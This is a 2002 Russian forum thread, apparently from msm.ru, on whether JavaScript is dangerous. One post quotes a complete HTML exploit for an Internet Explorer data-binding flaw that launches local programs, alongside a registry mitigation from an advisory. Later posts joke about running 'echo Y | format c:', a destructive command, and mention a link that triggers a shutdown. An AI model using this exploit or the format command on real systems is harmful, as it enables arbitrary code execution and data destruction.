На главную Наши проекты:
Журнал   ·   Discuz!ML   ·   Wiki   ·   DRKB   ·   Помощь проекту
ПРАВИЛА FAQ Помощь Участники Календарь Избранное RSS
Дорогие друзья! Поздравляем вас с днём Победы!
msm.ru
  
> А javascript-ы опасны ???
    ::)  Т.е. можно ли с их помощью поменять что-либо на серваке, с которого они приходят (желательно чем-нибудь подтвердить свое мнение)?

    Пардон, если не все поняли.
      В JavaScript в принципе не заложены средства общения с устройствами
      и с удаленными машинами. По идее - безопасно.
      Однако, никто не застрахован от всяких дыр/Exploit-ов.
      Я был приятно удивлен :) когда простенький html-код сам запустил на моей машине игрушку :)
        Цитата vot, 29.05.02, 10:12:20
        ... Однако, никто не застрахован от всяких дыр/Exploit-ов.
        Я был приятно удивлен :) когда простенький html-код сам запустил на моей машине игрушку :)

        Ух-ты  :o! А че за код  ;)!
          Еще надо отдавать отчет, что существуют WindowsScripts технологии, они позволяют запустить j-скрипт вне браузера, при этом он получает доступ к файловой системе и реестру. Есно, может и нагадить...
            >=== cut ===<
            Обнаружена серьёзная уязвимость в браузере IE.

            Израильские специалисты по компьютерной безопасности обнаружили весьма
            серьезную уязвимость в браузере IE. С её помощью на удаленной машине можно
            запустить любую программу, причем без использования скриптов и ActiveX.
            Задействовать её можно с помощью следующего HTML-кода:

            <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span><xml
            id="oExec">
               <security>
                   <exploit>
                       <![CDATA[
                       <object id="oFile"
            classid="clsid:11111111-1111-1111-1111-111111111111"
            codebase="c:/windows/system32/winmine.exe"></object>
                       ]]>
                   </exploit>
               </security>
            </xml>


            Данный код можно скопировать в блокнот и сохранить в файл с расширением html.
            Если этот файл будет открыт в IE, автоматически запустится игра САПЁР но
            запустить можно любую программу и команду что делает эту уязвимость просто
            ужасной. Уязвимость присутствует во всех версиях IE, так как используется
            функция "data binding", введенная еще в IE4.

            [CompuLenta]

            AVP ругается на этот код  и говорит что есть подозрение на
            Exploit.CodeBaseExec, но в данном случае это не вирус!
            NAV и другие антивирусы  вообще не реагируют на это :-(

            Так что пока не найдено решение как закрыть данную уязвимость обязательно
            обновите антивирусные базы AVP и не выключайте AVP ни при каких
            обстоятельствах, не открывайте подобные демонстрационные странички в Интернете
            или в сомнительных местах, не известно что туда могут записать не порядочные
            люди.... Самое страшное это то что данный код можно пересылать по электронной
            почте в  коде :-(
            >=== cut ===<

               Хм... проверил -- точно падла запускается. :-(
            Как вариант еще чуть защититься от такой гадости --
            ставить винду в каталог с нестандартным названием.
              Есть вариант, который полностью решает эту проблему.

              http://security.greymagic.com/adv/gm001-ie/

              ==========
              Solution:

              There is no configuration-tweaking workaround for this bug, it will work as
              long as the browser parses HTML. The only possible solution must come in the
              form of a patch from Microsoft.

              Since the injected <object> runs in the "My Computer" Zone changing the
              Internet Zone's settings didn't affect it, but changing the correct zone's
              settings will prevent this exploit from running.

              Here is the registry information:

              [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
              Settings\Zones\0]
              Change the value of "1004" (DWORD) to 0x3.
              ==========
                Цитата vot, 29.05.02, 16:13:16
                ...ставить винду в каталог с нестандартным названием.

                Это надо делать (использовать нестандартные имена и т.п.) всегда, когда речь заходит о безоп-ти, хакеры за такие вещи быстро цепляются...

                Кстати, когда занимался анализом защищ-ти разл. серваков, оказалось, что этот прием используется довольно часто.
                  > === cut ===<

                  Счастливым пользователям Win'XP предлагаю сходить на
                  http://www.fuck.org/~max/xp_rules.jpg
                  Утверждается, что данная ссылка валитXP намертво.
                  Сам проверить не могу, т.к. меня это XP не впечатлило.

                  DZ> По этой ссылочке лежит банальный эксплойт, который ты же и описывал

                  Он ничего кроме запуска poweroff.exe больше не делает.
                  Касперский его сразу за задницу хватает, если запущен.

                  > === cut ===<
                    Цитата vot, 29.05.02, 16:13:16
                    >=== cut ===<
                    Обнаружена серьёзная уязвимость в браузере IE.
                    [> eated by Moderator <]

                    Круто - проверил недавно.  ;D
                    А "Format C:\" - тоже ведь можно запустить ;D ;D ;D ;D ;D ;D ;D
                    Сообщение отредактировано: vot -
                      2 Docent:

                      Не надо цитировать все подряд - только самое необходимое!
                        2 Docent - просто format c: ничего не решает
                        а вот если  -  ;D echo Y | format c: \%format c:\% ;D
                        тогда уже будет  :'(
                        0 пользователей читают эту тему (0 гостей и 0 скрытых пользователей)
                        0 пользователей:


                        Рейтинг@Mail.ru
                        [ Script execution time: 0,0253 ]   [ 15 queries used ]   [ Generated: 13.05.24, 04:18 GMT ]